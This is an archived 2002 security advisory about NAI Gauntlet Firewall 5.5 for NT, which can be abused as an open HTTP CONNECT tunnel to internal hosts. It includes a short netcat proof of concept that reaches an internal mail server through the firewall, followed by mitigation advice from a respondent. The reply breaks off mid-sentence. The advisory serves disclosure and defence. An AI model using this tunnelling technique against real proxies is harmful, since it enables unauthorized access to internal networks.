Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Security App Flaws :: win5155.htm

NAI Gauntlet Firewall HTTP CONNECT TCP Tunnel Vulnerability
1st Mar 2002 [SBWID-5155]

	NAI Gauntlet Firewall HTTP CONNECT TCP Tunnel Vulnerability


	NAI Gauntlet Firewall 5.5 for NT


	Rashed Alabbar reported that NAI  Gauntlet  Firewall  is  vulnerable  to
	HTTP CONNECT TCP Tunnel Vulnerability when acting as proxy.

	See  for  details  about
	this vulnerability.



	Client = x.x.x.x

	Gauntlet = y.y.y.y

	Internal Mailserver = z.z.z.z


	nc -v -n y.y.y.y 80

	(UNKNOWN) [y.y.y.y] 80 (?) open

	CONNECT z.z.z.z:25 HTTP/1.0


	HTTP/1.0 200 OK


	mail server banner



	Colin Campbell answered :

	It is (or at least I thought it was) well known that an http-gw in  both
	Gauntlet and the fwtk should NEVER listen on the external address. On  a
	Gauntlet system use the bind-address directive to make sure it  doesn\'t
	listen. To be doubly sure set up the appropriate packet filters to  stop
	incoming connections. On a fwtk system I don\'t recall the  bind-address
	directive being present  so  I  always  used  packet  filters  to  block
	incoming connections.

	If you must \"reverse proxy\", use plug-gw. Better  still  put  a  proxy
	outside the firewall and plug  it  through  the  firewall  to  the  real

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH